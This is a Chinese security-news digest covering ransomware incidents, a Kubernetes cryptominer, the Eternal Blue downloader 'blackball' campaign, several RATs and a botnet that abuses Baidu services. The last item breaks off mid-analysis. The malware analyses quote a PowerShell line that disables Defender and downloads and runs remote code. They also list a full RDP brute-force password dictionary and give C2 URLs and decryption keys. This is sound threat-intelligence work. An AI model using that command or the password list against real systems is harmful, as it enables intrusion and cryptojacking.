分类: 恶意软件

商业服务巨头 Conduent 遭 Maze 勒索软件攻击

Maze勒索软件运营商声称已经成功攻击了商业服务巨头Conduent,他们窃取了其网络上未加密的文件并攻破加密设备。Conduent是一家位于美国新泽西州的商业服务公司,拥有6.7万名员工,2019年业务收入为44.7亿美元。 今天,Maze勒索软件操作者在他们的数据泄露网站上发布了一个新的条目,称他们在2020年5月入侵Conduent网络。在进行攻击时,Maze勒索软件的操作者会在部署勒索软件之前窃取未加密的文件。这些被窃取的数据和公开发布的威胁,被用作杠杆,说服受害者支付赎金。Maze勒索入侵者公布的入侵Conduent的证据,包括1GB文件,据称是在勒索软件攻击期间被盗取的。发布的文件名为’BusinessIntelligence.zip’和’Compliance1.zip’,包括各种财务电子表格、客户审计、发票、佣金报表和其他杂项文件。 由于已经发布的数据类型多样,Conduent必须将其作为数据泄露事件向客户和员工披露。在给BleepingComputer的一份声明中,Conduent证实他们在2020年5月29日遭受了勒索软件攻击,影响服务约10小时。Conduent表示:“旗下欧洲业务在2020年5月29日星期五经历了一次服务中断。我们的系统识别到了勒索软件,随后我们的网络安全协议对其进行了处理。这次中断始于欧洲中部时间5月29日凌晨12点45分,到欧洲中部时间当天上午10点,系统大部分又恢复了生产,此后所有系统都恢复了。这导致我们向部分客户提供的服务部分中断。随着我们的调查继续进行,我们有内部和外部安全取证和反病毒团队在审查和监控我们的欧洲基础设施。 威胁情报公司Bad Packets表示,在2019年12月17日到2020年2月14日之间的至少8周时间里,Conduent公司有一台Citrix服务器被曝出存在CVE-2019-19781漏洞。该漏洞允许攻击者在易受攻击的设备上进行远程代码执行,该漏洞已于2020年1月被修补。攻击者将这些设备作为中转站,然后在损害更多设备的同时,在内部网络中横向扩散。据悉,CVE-2019-19781漏洞过去曾被黑客用来入侵网络并部署勒索软件。虽然目前还不能确认这个漏洞是否被用作这次攻击的一部分,但Maze勒索软件操作者过去一直都是利用漏洞来进行网络入侵。     (稿源:cnBeta,封面源自网络。)  

勒索软件攻击者公开拍卖受害者机密数据

为迫使受害者支付赎金,勒索软件攻击者宣布拍卖受害者的机密数据。勒索软件 REvil、Sodin 和 Sodinokibi 背后的犯罪分子通过其维护的暗网网站 Happy Blog 启动了拍卖流程。 以前勒索软件攻击者为了迫使受害者支付赎金会选择性的披露部分窃取的数据。可能是早先的策略效果不佳,攻击者试图通过拍卖对受害者施加更大的压力。 Happy Blog 目前拍卖的数据来自于两家公司,其一是食品销售商,另一家是加拿大的农作物生产商。     (稿源:solidot,封面源自网络。)

谨防 Linux 挖矿木马通过 Kubernetes 途径入侵

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/sBiSo9fxONI60HxGnlB-Bg   近日,腾讯安全团队接受到部分用户反馈,部分Linux主机检测到名为docker的木马文件。经现场提取排查线索后,发现该挖矿木马疑似通过低版本Kubernetes组件入侵。入侵成功后在机器内执行恶意sh脚本,恶意脚本则进行同类木马清理,同时从82.146.53.166地址拉取矿机,配置后进行非法挖矿,目前看到的恶意sh脚本主要有以下2个版本。 版本一 功能结束当前机器内的其它挖矿相关模块,下载执行32/64不同版本的elf矿机程序到主机内tmp目录命名为docker,拉取矿机配置,执行矿机后删除本地矿机相关文件。 版本二 功能为结束当前机器内的其它挖矿相关模块,下载执行32/64不同版本的elf矿机程序到主机内tmp目录命名为php,拉取矿机配置,执行矿机后再删除本地矿机相关文件。该版本脚本同时增加了计划任务项,每分钟尝试执行一次sh脚本。 Tmp下名为docker或php的门罗币挖矿矿机,执行后会进行门罗币挖矿。 安全建议 1.排查清理主机root目录下,tmp目录下的docker名可疑矿机,php名可疑矿机文件; 2.排查crontab任务列表,删除异常的定时任务项; 3.查看机器内kubernetes组件,将其升级到最新版本; 4.Kubelet 外部访问配置认证授权,禁止匿名访问。 参考链接: https://cloud.tencent.com/developer/article/1549244 https://k8smeetup.github.io/docs/admin/kubelet-authentication-authorization/ https://github.com/easzlab/kubeasz/pull/192 https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c 关于Kubernetes Kubernetes是一个全新的基于容器技术的分布式架构领先方案。是Google内部集群管理系统Borg的一个开源版本。Kubernetes是一个开放的开发平台,不局限于任何一种语言,没有限定任何编程接口,是一个完备的分布式系统支撑平台。它构建在docker之上,提供应用部署、维护、扩展机制等功能,利用Kubernetes能方便地管理跨机器运行容器化的应用。 IOCs URL: hxxp://82.146.53.166/cr2.sh hxxp://82.146.53.166/xmrig_32 hxxp://82.146.53.166/p.conf hxxp://82.146.53.166/xmrig_64   MD5: 57b4ba0357815e44d8a1ac8e9c9dc7ab afb662fa877d773dafbaa47658ac176a 5110222de7330a371c83af67d46c4242

永恒之蓝木马下载器发起 “黑球”行动,新增 SMBGhost 漏洞检测能力

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/QEE95HTKzuT4-NykfvHfGQ   一、背景 腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现最新变种,此次变种的病毒延续上个版本的邮件蠕虫攻击方法,利用附带Office漏洞CVE-2017-8570漏洞的doc文档以及JS诱饵文件发送与新冠肺炎主题相关的钓鱼邮件。同时新增SMBGhost(CVE-2020-0796)漏洞检测和上报、新增SSH爆破攻击相关代码,推测其可能在后续攻击活动中利用SMBGhost漏洞、也可能发起针对Linux系统的攻击。 病毒Payload执行时安装随机名计划任务从新的C2地址t.zer9g.com、t.zz3r0.com下载a.jsp进行持久化攻击,a.jsp继续下载攻击模块if.bin、if_mail.bin以利用漏洞、弱口令爆破、钓鱼邮件群发等方式进行攻击传播,将XMRig门罗币矿机程序m6.bin、m6g.bin注入Powershell.exe运行。病毒还会安装没有实际功能的计划任务blackball(“黑球”),因此将此次攻击命名为“黑球”行动。 二、样本分析 1.钓鱼邮件攻击 首先从outlook应用程序会话中获取邮箱联系人。 然后自动生成readme.doc,readme.js两种附件文件,并将readme.js制作为压缩包readme.zip。其中readme.doc中包含Office漏洞CVE-2017-8570触发代码。readme.js中包含恶意Wscript脚本攻击代码。两种附件被打开后都会执行恶意命令下载http[:]//d.ackng.com/mail.jsp。 在$mail.Body中添加待发送邮件的邮件主题内容,从预置的9个主题中随机选择,主要包含“新冠肺炎COVID-19”, “日常联系对话”,“文件损坏无法查看”三种类型,具体内容如下: 生成的钓鱼邮件示例如下: 最后针对邮箱中发现的每一个联系人,依次发送包含恶意代码的附件readme.doc、readme.zip的邮件。 2.弱口令爆破 RDP(3389端口)弱口令爆破 爆破用户名:“administrator”,密码字典: `”saadmin”,“123456”,“test1”,“zinch”,“g_czechout”,“asdf”,“Aa123456.”,“dubsmash”,“password”,“PASSWORD”,“123.com”,“admin@123”,“Aa123456”,“qwer12345”,“Huawei@123”,“123@abc”,“golden”,“123!@#qwe”,“1qaz@WSX”,“Ab123”,“1qaz!QAZ”,“Admin123”,“Administrator”,“Abc123”,“Admin@123”,“999999”,“Passw0rd”,“123qwe!@#”,“football”,“welcome”,“1”,“12”,“21”,“123”,“321”,“1234”,“12345”,“123123”,“123321”,“111111”,“654321”,“666666”,“121212”,“000000”,“222222”,“888888”,“1111”,“555555”,“1234567”,“12345678”,“123456789”,“987654321”,“admin”,“abc123”,“abcd1234”,“abcd@1234”,“abc@123”,“p@ssword”,“P@ssword”,“p@ssw0rd”,“P@ssw0rd”,“P@SSWORD”,“P@SSW0RD”,“P@w0rd”,“P@word”,“iloveyou”,“monkey”,“login”,“passw0rd”,“master”,“hello”,“qazwsx”,“password1”,“Password1”,“qwerty”,“baseball”,“qwertyuiop”,“superman”,“1qaz2wsx”,“fuckyou”,“123qwe”,“zxcvbn”,“pass”,“aaaaaa”,“love”,“administrator”,“qwe1234A”,“qwe1234a”,“123123123”,“1234567890”,“88888888”,“111111111”,“112233”,“a123456”,“123456a”,“5201314”,“1q2w3e4r”,“qwe123”,“a123456789”,“123456789a”,“dragon”,“sunshine”,“princess”,“!@#$%^&*”,“charlie”,“aa123456”,“homelesspa”,“1q2w3e4r5t”,“sa”,“sasa”,“sa123”,“sql2005”,“sa2008”,“abc”,“abcdefg”,“sapassword”,“Aa12345678”,“ABCabc123”,“sqlpassword”,“sql2008”,“11223344”,“admin888”,“qwe1234”,“A123456”,“OPERADOR”,“Password123”,“test123”,“NULL”,“user”,“test”,“Password01”,“stagiaire”,“demo”,“scan”,“P@ssw0rd123”,“xerox”,“compta”`。 爆破成功后会上报该机器的IP以及此次成功登陆使用的密码,然后利用rdpexec模块远程执行代码$rdp_code: cmd /c powershell Set-MpPreference-DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershellIEX(New-Object Net.WebClient).DownloadString(”http[:]//t.amynx.com/rdp.jsp”) SMB爆破攻击(445端口) 爆破使用用户名为”administrator”,”admin”,爆破成功后远程执行代码$ipc_code: MSSQL爆破攻击(1433端口) 使用与RDP爆破同样的密码字典,爆破成功后远程执行代码$mscmd_code: 此外,最新的攻击代码中还加如了SSH爆破相关命令,该代码将会启动SSH爆破模块,并在爆破成功后执行远程命令$ssh_cmd。但是目前该功能并未启用,相关可能还在开发阶段,后续如果启用之后,可能会导致被感染的Windows机器通过SSH爆破攻击Linux系统。 3.漏洞攻击 1)   SMBGhost漏洞利用 永恒之蓝下载器木马变种会利用公开的漏洞检测代码检测存在SMBGhost漏洞(编号:CVE-2020-0796、绰号:永恒之黑)的机器IP并上报。 2020年3月12日腾讯安全威胁情报中心发布了SMBv3远程代码执行漏洞CVE-2020-0796(别名:SMBGhost,绰号:永恒之黑)预警公告:https://mp.weixin.qq.com/s/zwuDziMherWbUY2S2rrD8Q 2020年6月2日,国外安全研究员公开了一份SMBGhost漏洞CVE-2020-0796漏洞的RCE代码,腾讯安全团队已对其进行分析并预警:https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ 该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,除了直接攻击SMB服务端造成RCE外,攻击者可以构造特定的网页,压缩包,共享目录,OFFICE文档等多种方式触发漏洞进行攻击。由于漏洞利用源代码被公布,使得漏洞利用风险骤然升级,被黑灰产修改即可用于网络攻击。 2)   永恒之蓝漏洞利用 利用永恒之蓝漏洞攻击,攻击后远程执行代码$sc_code。 3)   Lnk漏洞(CVE-2017-8464)利用 Lnk漏洞利用CVE-2017-8464,在可移动盘、网络磁盘下创建具有CVE-2017-8464漏洞攻击代码的Lnk文件,一旦该文件被查看就会导致恶意代码执行。同时还会释放JS文件readme.js,通过伪装的文件在被误点击时感染病毒。 4.清除竞品挖矿木马 永恒之蓝下载器木马在攻击代码if.bin中Killer()函数中会详细地搜集大量竞争对手挖矿木马的信息,包括各类挖矿木马安装的服务、计划任务、进程名,以及挖矿使用的命令行特点、端口号特点来锁定目标并进行清除。 通过服务名匹配: `$SrvName =“xWinWpdSrv”, “SVSHost”, “Microsoft Telemetry”, “lsass”, “Microsoft”, “system”, “Oracleupdate”, “CLR”, “sysmgt”, “\gm”, “WmdnPnSN”, “Sougoudl”,“National”, “Nationaaal”, “Natimmonal”, “Nationaloll”, “Nationalmll”,“Nationalaie”,“Nationalwpi”,“WinHelp32”,“WinHelp64”, “Samserver”, “RpcEptManger”, “NetMsmqActiv Media NVIDIA”, “Sncryption Media Playeq”,“SxS”,“WinSvc”,“mssecsvc2.1”,“mssecsvc2.0”,“Windows_Update”,“Windows Managers”,“SvcNlauser”,“WinVaultSvc”,“Xtfy”,“Xtfya”,“Xtfyxxx”,“360rTys”,“IPSECS”,“MpeSvc”,“SRDSL”,“WifiService”,“ALGM”,“wmiApSrvs”,“wmiApServs”,“taskmgr1”,“WebServers”,“ExpressVNService”,“WWW.DDOS.CN.COM”,“WinHelpSvcs”,“aspnet_staters”,“clr_optimization”,“AxInstSV”,“Zational”,“DNS Server”,“Serhiez”,“SuperProServer”,“.Net CLR”,“WissssssnHelp32”,“WinHasdadelp32”,“WinHasdelp32”,“ClipBooks”` 通过计划任务名匹配: `$TaskName = “my1″,”Mysa”, “Mysa1”, “Mysa2”, “Mysa3”, “ok”, “Oracle Java”, “Oracle Java Update“, “Microsoft Telemetry“, “Spooler SubSystem Service“,”Oracle Products Reporter“, “Update service for products“, “gm“, “ngm“,”Sorry“,”Windows_Update“,”Update_windows“,”WindowsUpdate1“,”WindowsUpdate2“,”WindowsUpdate3“,”AdobeFlashPlayer“,”FlashPlayer1“,”FlashPlayer2“,”FlashPlayer3“,”IIS“,”WindowsLogTasks“,”System Log Security Check“,”Update“,”Update1“,”Update2“,”Update3“,”Update4“,”DNS“,”SYSTEM“,”DNS2“,”SYSTEMa“,”skycmd“,”Miscfost“,”Netframework“,”Flash“,”RavTask“,”GooglePingConfigs“,”HomeGroupProvider“,”MiscfostNsi“,”WwANsvc“,”Bluetooths“,”Ddrivers“,”DnsScan“,”WebServers“,”Credentials“,”TablteInputout“,”werclpsyport“,”HispDemorn“,”LimeRAT-Admin“,”DnsCore“,”Update service for Windows Service“,”DnsCore“,”ECDnsCore“` 通过命令行特征匹配: `$_.CommandLine -like‘*pool.monero.hashvault.pro*’ –Or $_.CommandLine -like ‘*blazepool*’ –Or$_.CommandLine -like ‘*blockmasters*’ –Or $_.CommandLine -like‘*blockmasterscoins*’ –Or $_.CommandLine -like ‘*bohemianpool*’ –Or$_.CommandLine -like ‘*cryptmonero*’ –Or $_.CommandLine -like ‘*cryptonight*’–Or $_.CommandLine -like ‘*crypto-pool*’ –Or $_.CommandLine -like‘*–donate-level*’ –Or $_.CommandLine -like ‘*dwarfpool*’ –Or $_.CommandLine-like ‘*hashrefinery*’ –Or $_.CommandLine -like ‘*hashvault.pro*’ –Or$_.CommandLine -like ‘*iwanttoearn.money*’ –Or $_.CommandLine -like‘*–max-cpu-usage*’ –Or $_.CommandLine -like ‘*mine.bz*’ –Or $_.CommandLine-like ‘*minercircle.com*’ –Or $_.CommandLine -like ‘*minergate*’ –Or$_.CommandLine -like ‘*miners.pro*’ –Or $_.CommandLine -like ‘*mineXMR*’ –Or$_.CommandLine -like ‘*minexmr*’ –Or $_.CommandLine -like ‘*mineXMR*’ –Or$_.CommandLine -like ‘*mineXMR*’ –Or $_.CommandLine -like‘*miningpoolhubcoins*’ –Or $_.CommandLine -like ‘*mixpools.org*’ –Or$_.CommandLine -like ‘*mixpools.org*’ –Or $_.CommandLine -like ‘*monero*’ –Or$_.CommandLine -like ‘*monero*’ –Or $_.CommandLine -like‘*monero.lindon-pool.win*’ –Or $_.CommandLine -like ‘*moriaxmr.com*’ –Or $_.CommandLine-like ‘*mypool.online*’ –Or $_.CommandLine -like ‘*nanopool.org*’ –Or$_.CommandLine -like ‘*nicehash*’ –Or $_.CommandLine -like ‘*-p x*’ –Or$_.CommandLine -like ‘*pool.electroneum.hashvault.pro*’ –Or $_.CommandLine-like ‘*pool.xmr*’ –Or $_.CommandLine -like ‘*poolto.be*’ –Or $_.CommandLine-like ‘*prohash*’ –Or $_.CommandLine -like ‘*prohash.net*’ –Or $_.CommandLine-like ‘*ratchetmining.com*’ –Or $_.CommandLine -like ‘*slushpool*’ –Or$_.CommandLine -like ‘*stratum+*’ –Or $_.CommandLine -like ‘*suprnova.cc*’ –Or$_.CommandLine -like ‘*teracycle.net*’ –Or $_.CommandLine -like ‘*usxmrpool*’–Or $_.CommandLine -like ‘*viaxmr.com*’ –Or $_.CommandLine -like ‘*xmrpool*’–Or $_.CommandLine -like ‘*yiimp*’ –Or $_.CommandLine -like ‘*zergpool*’ –Or $_.CommandLine-like ‘*zergpoolcoins*’ –Or $_.CommandLine -like ‘*zpool*’` 通过网络端口匹配: `($psids[0] -eq $line[-1]) –and $t.contains(“ESTABLISHED”) –and ($t.contains(“:1111”) –or $t.contains(“:2222”) –or $t.contains(“:3333”) –or $t.contains(“:4444”) –or $t.contains(“:5555”) –or $t.contains(“:6666”) –or $t.contains(“:7777”) –or $t.contains(“:8888”) –or $t.contains(“:9999”) –or $t.contains(“:14433”) –or $t.contains(“:14444”) –or $t.contains(“:45560”) –or $t.contains(“:65333”))` 通过进程名匹配: `$Miner =“SC”,“WerMgr”,“WerFault”,“DW20”,“msinfo”, “XMR*”,“xmrig*”, “minerd”, “MinerGate”, “Carbon”, “yamm1”, “upgeade”, “auto-upgeade”, “svshost”, “SystemIIS”, “SystemIISSec”, &apos;WindowsUpdater*&apos;, “WindowsDefender*”, “update”, “carss”, “service”, “csrsc”, “cara”, “javaupd”, “gxdrv”, “lsmosee”, “secuams”, “SQLEXPRESS_X64_86”, “Calligrap”, “Sqlceqp”, “Setting”, “Uninsta”, “conhoste”,“Setring”,“Galligrp”,“Imaging”,“taskegr”,“Terms.EXE”,“360”,“8866”,“9966”,“9696”,“9797”,“svchosti”,“SearchIndex”,“Avira”,“cohernece”,“win”,“SQLforwin”,“xig*”,“taskmgr1”,“Workstation”,“ress”,“explores”` 5.执行Payload 通过爆破、RCE漏洞攻击、钓鱼邮件攻击后会下载和执行Powershell代码: http[:]//t.amynx.com/mail.jsp或http[:]//t.amynx.com/usb.jsp mail.jsp更新C2地址为:t.amynx.com、t.zer9g.com、t.zz3r0.com,并且安装计划任务blackball(“黑球”),该计划任务无实际代码执行。 然后mail.jsp安装三个随机名计划任务(分别为<random>、<random>\<random>、MicroSoft\Windows\<random>),执行命令为“PS_CMD”。之后三个计划任务中的命令“PS_CMD”被替换为下载和执行Powershell代码http[:]//t.awcna.com/a.jsp、http[:]//t.zer9g.com/a.jsp、http[:]//t.zz3r0.com /a.jsp以达到持久化攻击。 a.jsp负责下载攻击模块if.bin执行漏洞利用和弱口令爆破功能。下载门罗币挖矿模块m6.bin、m6g.bin,并通过Invoke-ReflectivePEInjection将XMR挖矿木马注入Powershell.exe运行,连接矿池lplp.ackng.com:443挖矿,导致CPU占用率接近100%。 将OutLook注册表 “*\Outlook\Security”下的ObjectModelGuard值设为2,即不对outlook任何可疑活动进行提示。 然后下载和执行Powershell版邮件蠕虫攻击程序http[:]//d.ackng.com/if_mail.bin,获取邮箱所有联系人,依次发送钓鱼邮件,进入下一轮攻击流程。 6.历次版本修改 根据腾讯安全威胁情报中心持续跟踪结果,永恒之蓝下载器木马在2018~2020间,已升级十余次,历次变化情况如下: IOCs Domain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com   URL: http[:]//d.ackng.com/if_mail.bin http[:]//d.ackng.com/if.bin http[:]//t.zer9g.com/a.jsp http[:]//t.zz3r0.com/a.jsp http[:]//t.amynx.com/mail.jsp   md5 参考链接: https://mp.weixin.qq.com/s/bibSEjfLnuOA9vyEMHkv9Q https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ

ShellReset RAT 利用基于恶意宏的 word 文档传播

之前我们说到:网络犯罪分子通常会将攻击点与热点相联系。近期,我们就发现有犯罪分子使用伦敦技术事件做诱饵来进行网络攻击。 2020年2月-5月,我们观察到在基于.space和.xyz域的新注册站点上托管了四个基于恶意宏的Microsoft Word文档。由于几个文档的最终有效负载的部署策略、技术和过程(TTP)十分类似,我们认为这是同一个攻击者的行为。 据了解,.NET有效负载的最终版以往从未被检测到过,它的代码段很小,而且与QuasarRAT相重叠,但此代码段在运行时并未使用。根据最终有效负载中的唯一字符串我们为把该RAT命名为ShellReset。由于被检测到的数量有限,我们认为这可能是是一种小范围的攻击活动,而攻击者在这个攻击过程中使用的主题也和今年在伦敦发生的热点事件有关,其中还包括5G Expo 和Futurebuild。 其中的感染链涉及一些有趣的技术,如在运行时使用受信任的Windows实用程序在终端上编译有效负载以绕过安全机制,还会从攻击者的服务器下载混淆后的源代码。本文我将对分发策略和攻击的技术进行详细分析。   … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1228/     消息来源:zscaler, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Himera 和 AbSent-Loader 利用 Covid19 主题传播恶意软件

我们在日常的网络监测中,对许多伪装的电子邮件进行了拦截。这些邮件利用正在发生的冠状病毒有关的FMLA(《家庭医疗休假法》)要求,使用Himera和Absent-Loader这两种网络犯罪工具对数据进行了处理。 加载程序是一种恶意代码,用于将其他恶意软件代码加载到受害者的计算机中并对数据进行窃取。攻击者们会把被盗取的信息进行售卖,来获得相应的报酬。 此恶意活动中的样本首先使用Word文档(该文档指的是可执行文件),然后再删除另一个可执行文件并进行重命名,借此来逃避检测。     … 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1226/     消息来源:yoroi, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

从 Agent.BTZ 到 ComRAT v4 的十年发展历程

ESET研究人员近期发现了由Turla组织ComRAT经营的恶意软件的更新版本。Turla,也被称为Snake,是一个臭名昭著的间谍组织,已经活跃了十多年,之前也介绍过许多该组织的活动。 ComRAT,也称为Agent.BTZ,是一种用于远程访问特洛伊木马(RAT),该木马在2008年因违反美国军方使用规则声名狼藉。该恶意软件的第一版(约在2007年发布)通过传播可移动驱动器来展现蠕虫功能。从2007年到2012年,已经发布了RAT的两个主要版本。有趣的是,它们都使用了著名的Turla XOR密钥: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 2017年,Turla开发人员对ComRAT进行了一些更改,但这些变体仍然是从相同的代码库中派生出来的,相关研究报告请见https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf。此外还发布了不同的ComRAT版本。这个新版本使用了全新的代码库,相比之前的版本会复杂很多。以下是该恶意软件的几个特征: ComRAT v4于2017年首次亮相,直到2020年1月仍在使用。 其至少确定了三个攻击目标:两个外交部和一个国民议会。 ComRAT用于窃取敏感文档,运营商使用OneDrive和4shared等云服务来窃取数据。 ComRAT是用C ++开发的复杂后门程序。 ComRAT使用FAT16格式化的虚拟FAT16文件系统。 其使用现有的访问方法(例如PowerStalli on PowerShell后门)部署ComRAT。 ComRAT具有两个命令和控制通道: 1.HTTP:它使用与ComRAT v3完全相同的协议; 2.电子邮件:它使用Gmail网络界面接收命令并窃取数据。 ComRAT可以在受到感染的计算机上执行如泄露其他程序或文件的操作。   …… 更多内容请至Seebug Paper阅读全文:https://paper.seebug.org/1222/     消息来源:welivesecurity, 译者:dengdeng。 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

报告显示僵尸网络会利用百度贴吧等常用服务进行管理

有关研究报告显示,双枪恶意程序的僵尸网络利用国内的常用服务进行管理。该僵尸网络的数量超过了 10 万。研究人员观察到双枪恶意程序使用百度贴吧图片来分发配置文件和恶意软件,使用了阿里云存储来托管配置文件,利用百度统计管理感染主机的活跃情况,恶意程序样本中还多次发现了腾讯微云的 URL 地址。 它第一次将 BAT 三大厂商的服务集成到了自己的程序中。百度已经采取行动阻断恶意代码下载链接,以下为报告全文。 概述 近日,我们的域名异常监测系统 DNSMon 捕捉到域名 pro.csocools.com 的异常活动。根据数据覆盖度估算,感染规模超过100k。我们通过告警域名关联到一批样本和 C2,分析样本后发现是与双枪恶意程序相关的团伙开始新的大规模活动。近年来双枪团伙屡次被安全厂商曝光和打击,但每次都能死灰复燃高调复出,可见其下发渠道非常庞大。本次依然是因为受感染主机数量巨大,导致互联网监测数据异常,触发了netlab的预警系统。本报告中我们通过梳理和这些URL相关的C2发现了一些模式,做了一些推测。 我们观察到恶意软件除了使用百度贴吧图片来分发配置文件和恶意软件,还使用了阿里云存储来托管配置文件。为了提高灵活性和稳定性,加大阻拦难度,开发者还利用百度统计这种常见的网络服务来管理感染主机的活跃情况。同时我们在样本中多次发现了腾讯微云的URL地址,有意思的是我们在代码中并没有找到引用这些地址的代码。至此,双枪团伙第一次将BAT三大厂商的服务集成到了自己的程序中,可以预见使用开放服务来管理僵尸网络或将成为流行趋势。有必要澄清的是,这些公开服务本身均为技术中立,此恶意代码中滥用这些公开服务完全是其作者的蓄意行为,各主要互联网公司均在用户许可中明确反对并采取措施抵御这些恶意滥用行为。 5月14日起,我们联系到了百度安全团队,采取了联合行动,对该恶意代码的传播范围做了度量,并采取了抵御措施。截止本文发稿,相关的恶意代码下载链接已经被阻断。百度安全团队对该事件的声明见文末。 IOC关联分析 从告警域名入手,通过DNS解析记录和样本流量分析建立IOC关联,过滤掉孤立和噪音节点,我们找到了一组与此次传播活动有关的关键C2。从下面截取的部分IOC关联图可以看出,几乎所有的域名都和两个关键的ip 地址 125.124.255.20 和 125.124.255.79 有关,围绕这两个ip地址,双枪团伙从19年下半年开始依次启用了一批域名来控制和下发恶意程序。事实上这个团伙长期且稳定的控制了大量 125.124.255.0/24 网段的ip地址,可以看出他们拥有非常丰富的网络资源。 通过样本溯源可以看到,这次大规模感染主要是通过诱导用户安装包含恶意代码的网游私服客户端,具体感染方式大体分为两种,下面进行深入分析。 感染方式1 — 启动器内包含恶意代码   阶段1 — 下载并加载cs.dll恶意文件 各类私服入口 点击下载链接跳到私服主页 登录器下载 “蟠龙军衔.zip” 含恶意代码的私服客户端启动器被用户下载并执行,恶意代码访问配置信息服务器,然后根据配置信息从百度贴吧下载并动态加载名为 cs.dll 的最新版本恶意程序。cs.dll 中的敏感字串使用了一种变形的 DES 加密方法,这种加密算法和我们之前捕捉到的双枪样本高度相似。我们从样本主体 exe 文件入手,逐步分析上述恶意行为。 文件结构 “蟠龙军衔.exe” PE Resource 中包含 7 个文件,Widget.dll 是客户端组件,资源文件中的cs.dll 是旧版的恶意程序。4 个 .sys 文件是私服客户端的驱动程序,虽然命名为Game Protect,但我们在代码中发现了劫持流量插入广告的代码。 下载配置信息 启动器创建线程访问加密配置文件 http://mtdlq.oss-cn-beijing.aliyuncs.com/cscsmt.txt 页面包含 8 行 16 进制字串,与密钥 B2 09 BB 55 93 6D 44 47 循环异或即可解密。 解密后是 8 个百度贴吧图片的地址。 下载图片文件切割并重组 cs.dll 文件 直接访问图片地址,图片文内容看起来像是随机生成的。 恶意程序会下载图片文件,每张图片使用 ><>>>< 为标记来分隔图像数据和恶意代码数据。 把所有恶意代码拼接起来我们得到了阶段 2 的恶意程序 cs.dll。 恶意程序通过内存映射的方式加载上述 cs.dll,然后调用导出函数 abcd() 进入阶段 2 ,所以并没有文件落地。 阶段2 — 上报主机信息,释放并加载恶意驱动 cs.dll 会进行一些简单的虚拟机和杀软对抗,利用百度统计服务上报 Bot 信息,释放第 3 阶段 VMP 加壳的驱动程序(包含x86/x64两个版本)。 DES 解密算法 样本中的 DES 解密算法为恶意软件作者自定义实现,加密模式为 CBC,无填充。DES 加密算法的转换表与旧版(“双枪”木马的基础设施更新及相应传播方式的分析)相同 。本次恶意活动涉及的 DES 解密,都涉及 2 层解密,第一层解密,先以 Base64 算法解码字符串 dBvvIEmQW2s= 得到一份二进制数据,再以空密钥 \x00\x00\x00\x00\x00\x00\x00\x00 对上述二进制数据解密,得出字串 helloya\x00,再以此字串作为密钥,用自研 DES 算法解密其他大量密文数据。完整的解密过程如下: 检查虚拟主机环境 VM 和 WM 通过检查注测表项判断是否是 VMWare 主机,如果是 VM 主机代码则直接返回。 创建 Bot ID 使用系统 API 创建主机的 Bot ID,写入注册表 SOFTWARE\\PCID, 利用百度统计服务管理 Bot 恶意软件的开发者借用了百度统计接口的一些标准字段来上报主机敏感信息,利用百度统计这种常见的网络行为来管理感染主机的活跃情况。因为百度统计服务被大量网站使用,从流量上看是一套合规的浏览器网络行为,所以很难将其区分出来,加大了安全厂商打击的难度。 恶意程序首先使用一个名为 DataWork() 的函数伪造浏览器请求,下载 hm.js 脚本。 保存返回信息中的用户 Cookie 信息 HMACCOUNT 到注册表。 通过 http://hm.baidu.com/hm.gif? 接口,恶意程序将提取到的统计脚本的版本信息this.b.v、用户 Cookie 信息、bot_id 和伪造的其它统计信息组包上报,恶意软件开发者使用百度统计的后台可以方便的管理和评估感染用户。 从 Dat 资源解密,创建,安装驱动 检查是否安装了 XxGamesFilter 等私服客户端驱动。 根据安装情况和操作系统版本选择不同的资源 ID,每一个资源对应不同版本的驱动(32 位系统使用 ID 为 111 或 109 资源,64 位系统使用 ID 为 110 或 112 的资源)。 资源是简单加密过的,以解密 32 位驱动为例,首先倒转数据顺序,然后逐字节和系统版本数值 32 异或,得到一个 VMP 加壳的驱动文件。 测是否存在 TeSafe 驱动,如果存在刚中断感染流程。计算 TeSafe+{Computer Name} 的 MD5 值,检测是否存在名为该 MD5 字串的驱动,如果存在说明系统已经被感染过,也会中断感染流程。 //拼接字串 +00   54 65 53 61 66 65 2B 57 49 4E 2D 52 48 39 34 50      TeSafe+WIN-RH94P        +10   42 46 43 37 34 41 00 00 00 00 00 00 00 00 00 00      BFC74A..........        //拼接字串的MD5值  +00   46 34 36 45 41 30 37 45 37 39 30 33 33 36 32 30      F46EA07E79033620        +10   43 45 31 33 44 33 35 44 45 31 39 41 41 43 34 32      CE13D35DE19AAC42 如果系统 EnableCertPaddingCheck 注册表项关闭,则替换文件末尾 16 字节为随机数据。这样每个感染主机上的样本 HASH 值完全不一样,可以对抗基于 HASH 查杀的方案。 将驱动程序释放到 TEMP 目录下,文件名为长度为 7 的随机字符串。例如:"C:\Users\{User Name}\AppData\Local\Temp\iiitubl" 注册驱动文件启动服务并检测安装是否成功。 阶段3 — 劫持系统进程,下载后续恶意程序 驱动运行后会拷贝自己到 Windows/system32/driver/{7个随机字符}.sys ,伪造驱动设备信息为常见的合法驱动,如 fltMgr.sys ,向系统进程 Lassas.exe 和 svchost.exe 注入 DLL 模块。完成整个初始化过程后,就形成了一个驱动和 DLL 模块通过 DeviceIoControl() 